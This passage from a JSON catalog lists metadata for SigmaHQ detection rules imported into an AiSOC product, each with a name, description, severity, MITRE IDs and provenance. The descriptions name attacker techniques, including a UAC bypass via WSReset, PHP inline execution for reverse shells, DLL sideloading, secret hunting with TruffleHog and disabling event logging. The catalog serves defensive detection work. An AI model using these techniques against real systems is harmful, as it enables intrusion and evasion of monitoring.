Often used by attackers to allow ransomware to run in safe mode, where some security products do not run.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-safeboot-keys-via-reg-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml" } }, { "id": "sigmahq-sigma-d7821ff1-4527-4e33-9f84-d0d57fa2fb66", "type": "detection", "name": "Print History File Contents", "description": "Detects events in which someone prints the contents of history files to the command line or redirects them to a file for reconnaissance", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1592.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/print-history-file-contents.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml" } }, { "id": 
"sigmahq-sigma-d78b5d61-187d-44b6-bf02-93486a80de5a", "type": "detection", "name": "HackTool - DInjector PowerShell Cradle Execution", "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-dinjector-powershell-cradle-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d78b5d61-187d-44b6-bf02-93486a80de5a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_dinjector.yml" } }, { "id": "sigmahq-sigma-d797268e-28a9-49a7-b9a8-2f5039011c5c", "type": "detection", "name": "Bypass UAC via WSReset.exe", "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). 
Adversaries use this technique to execute privileged processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bypass-uac-via-wsreset-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml" } }, { "id": "sigmahq-sigma-d7a63acb-1284-49bc-bfea-7771146c8b1c", "type": "detection", "name": "Potential Vcruntime140 DLL Sideloading", "description": "Detects potential DLL sideloading of vcruntime140.dll, a common C++ runtime library.\nThreat actors have been observed using DLL sideloading techniques to load malicious payloads under the guise of legitimate applications such as SqlWriter, SqlDumper etc.\nNotably, APT29 has been documented leveraging WinELOADER to sideload vcruntime140.dll for executing malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-vcruntime140-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7a63acb-1284-49bc-bfea-7771146c8b1c", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_vcruntime140.yml" } }, { "id": "sigmahq-sigma-d7a650c4-226c-451e-948f-cc490db506aa", "type": "detection", "name": "PUA - TruffleHog Execution - Linux", "description": "Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously.\nWhile it is a legitimate tool, intended for use in CI pipelines and security assessments,\nIt was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083", "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-trufflehog-execution-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7a650c4-226c-451e-948f-cc490db506aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_pua_trufflehog.yml" } }, { "id": "sigmahq-sigma-d7a95147-145f-4678-b85d-d1ff4a3bb3f6", "type": "detection", "name": "CobaltStrike Service Installations - Security", "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1543.003", "T1569.002" 
], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cobaltstrike-service-installations-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml" } }, { "id": "sigmahq-sigma-d7b50671-d1ad-4871-aa60-5aa5b331fe04", "type": "detection", "name": "Suspicious File Creation In Uncommon AppData Folder", "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well-known directories (Local, Roaming, LocalLow). 
This could be used as a method to bypass detections that exclude the AppData folder for fear of FPs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-creation-in-uncommon-appdata-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml" } }, { "id": "sigmahq-sigma-d7b81144-b866-48a4-9bcc-275dc69d870e", "type": "detection", "name": "Windows EventLog Autologger Session Registry Modification Via CommandLine", "description": "Detects attempts to disable Windows EventLog autologger sessions via registry modification.\nThe AutoLogger event tracing session records events that occur early in the operating system boot process.\nApplications and device drivers can use the AutoLogger session to capture traces before the user logs in.\nAdversaries may disable these sessions to evade detection and prevent security monitoring of early boot activities and system events.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-eventlog-autologger-session-registry-modification-via-commandline.yaml", "quarantine_reason": "imported 
rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7b81144-b866-48a4-9bcc-275dc69d870e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_autologger_session_registry_modification.yml" } }, { "id": "sigmahq-sigma-d7bcd677-645d-4691-a8d4-7a5602b780d1", "type": "detection", "name": "Potential PowerShell Command Line Obfuscation", "description": "Detects the PowerShell command lines with special characters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-powershell-command-line-obfuscation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml" } }, { "id": "sigmahq-sigma-d7c75059-2901-4578-b209-8837fd31c6a8", "type": "detection", "name": "Proxy Execution via Vshadow", "description": "Detects the invocation of vshadow.exe with the -exec parameter that executes a specified script or command after the shadow copies are created but before the VShadow tool exits.\nVShadow is a command-line tool that you can use to create and manage volume shadow copies. 
While legitimate backup or administrative scripts may use this flag,\nattackers can leverage this parameter to proxy the execution of malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/proxy-execution-via-vshadow.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7c75059-2901-4578-b209-8837fd31c6a8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vshadow_exec.yml" } }, { "id": "sigmahq-sigma-d7eab125-5f94-43df-8710-795b80fa1189", "type": "detection", "name": "Microsoft 365 - Impossible Travel Activity", "description": "Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-365-impossible-travel-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7eab125-5f94-43df-8710-795b80fa1189", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/cloud/m365/threat_management/microsoft365_impossible_travel_activity.yml" } }, { "id": "sigmahq-sigma-d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "type": "detection", "name": "Suspicious Control Panel DLL Load", "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-control-panel-dll-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml" } }, { "id": "sigmahq-sigma-d7fb8f0e-bd5f-45c2-b467-19571c490d7e", "type": "detection", "name": "Cleartext Protocol Usage", "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.\nEnsure that an encryption is used for all sensitive information in transit. 
Ensure that encrypted channels are used for all administrative account access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "low", "category": "network", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/network/cleartext-protocol-usage.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7fb8f0e-bd5f-45c2-b467-19571c490d7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/firewall/net_firewall_cleartext_protocols.yml" } }, { "id": "sigmahq-sigma-d80d5c81-04ba-45b4-84e4-92eba40e0ad3", "type": "detection", "name": "Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE", "description": "Detects execution of arbitrary DLLs or unsigned code via \".csproj\" files via Dotnet.EXE.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-dll-or-csproj-code-execution-via-dotnet-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dotnet_arbitrary_dll_csproj_execution.yml" } }, { "id": "sigmahq-sigma-d81871ef-5738-47ab-9797-7a9c90cd4bfb", "type": "detection", "name": "Php Inline Command Execution", "description": "Detects 
execution of php using the \"-r\" flag. This could be used as a way to launch a reverse shell or execute live php code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/php-inline-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml" } }, { "id": "sigmahq-sigma-d84c0ded-edd7-4123-80ed-348bb3ccc4d5", "type": "detection", "name": "Suspicious SQL Query", "description": "Detects suspicious SQL query keywords that are often used during recon, exfiltration or destructive activities. 
Such as dropping tables and selecting wildcard fields", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-sql-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d84c0ded-edd7-4123-80ed-348bb3ccc4d5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/category/database/db_anomalous_query.yml" } }, { "id": "sigmahq-sigma-d85873ef-a0f8-4c48-a53a-6b621f11729d", "type": "detection", "name": "Remote Access Tool - LogMeIn Execution", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-logmein-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d85873ef-a0f8-4c48-a53a-6b621f11729d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_logmein.yml" } }, { "id": "sigmahq-sigma-d87bd452-6da1-456e-8155-7dc988157b7d", "type": "detection", "name": "Suspicious Usage Of ShellExec_RunDLL", "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the raspberry-robin attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-usage-of-shellexec-rundll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d87bd452-6da1-456e-8155-7dc988157b7d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml" } }, { "id": 
"sigmahq-sigma-d88d0ab2-e696-4d40-a2ed-9790064e66b3", "type": "detection", "name": "Modification of IE Registry Settings", "description": "Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert JavaScript for persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/modification-of-ie-registry-settings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_ie.yml" } }, { "id": "sigmahq-sigma-d8b0a4fe-07a8-41be-bd39-b14afa025d95", "type": "detection", "name": "Activity from Anonymous IP Addresses", "description": "Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1573" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/activity-from-anonymous-ip-addresses.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "d8b0a4fe-07a8-41be-bd39-b14afa025d95", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_activity_from_anonymous_ip_addresses.yml" } }, { "id": "sigmahq-sigma-d8d97d51-122d-4cdd-9e2f-01b4b4933530", "type": "detection", "name": "Capabilities Discovery - Linux", "description": "Detects usage of \"getcap\" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/capabilities-discovery-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d8d97d51-122d-4cdd-9e2f-01b4b4933530", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml" } }, { "id": "sigmahq-sigma-d8ffe17e-04be-4886-beb9-c1dd1944b9a8", "type": "detection", "name": "Remote Registry Recon", "description": "Detects remote RPC calls to collect information", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-registry-recon.yaml", "quarantine_reason": "imported rule; upstream query language 
not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d8ffe17e-04be-4886-beb9-c1dd1944b9a8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" } }, { "id": "sigmahq-sigma-d9047477-0359-48c9-b8c7-792cedcdc9c4", "type": "detection", "name": "PUA - NirCmd Execution As LOCAL SYSTEM", "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-nircmd-execution-as-local-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_nircmd_as_system.yml" } }, { "id": "sigmahq-sigma-d93129cd-1ee0-479f-bc03-ca6f129882e3", "type": "detection", "name": "Powershell Detect Virtualization Environment", "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ 
"T1497.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-detect-virtualization-environment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d93129cd-1ee0-479f-bc03-ca6f129882e3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml" } }, { "id": "sigmahq-sigma-d9367cbb-c2e0-47ce-bdc0-128cb6da898d", "type": "detection", "name": "HackTool - SharpLdapWhoami Execution", "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpldapwhoami-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml" } }, { "id": "sigmahq-sigma-d937b75f-a665-4480-88a5-2f20e9f9b22a", "type": "detection", "name": "Possible Privilege Escalation via Weak Service Permissions", "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service 
ImagePath or FailureCommand", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/possible-privilege-escalation-via-weak-service-permissions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" } }, { "id": "sigmahq-sigma-d94a35f0-7a29-45f6-90a0-80df6159967c", "type": "detection", "name": "Cisco Denial of Service", "description": "Detect a system being shutdown or put into different boot mode", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1495", "T1529", "T1565.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-denial-of-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d94a35f0-7a29-45f6-90a0-80df6159967c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_dos.yml" } }, { "id": "sigmahq-sigma-d9557b75-267b-4b43-922f-a775e2d1f792", "type": "detection", "name": "Azure Point-to-site VPN 
Modified or Deleted", "description": "Identifies when a Point-to-site VPN is Modified or Deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-point-to-site-vpn-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d9557b75-267b-4b43-922f-a775e2d1f792", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_network_p2s_vpn_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", "type": "detection", "name": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE", "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE\nCheck if the user that executed the commands is suspicious (e.g. 
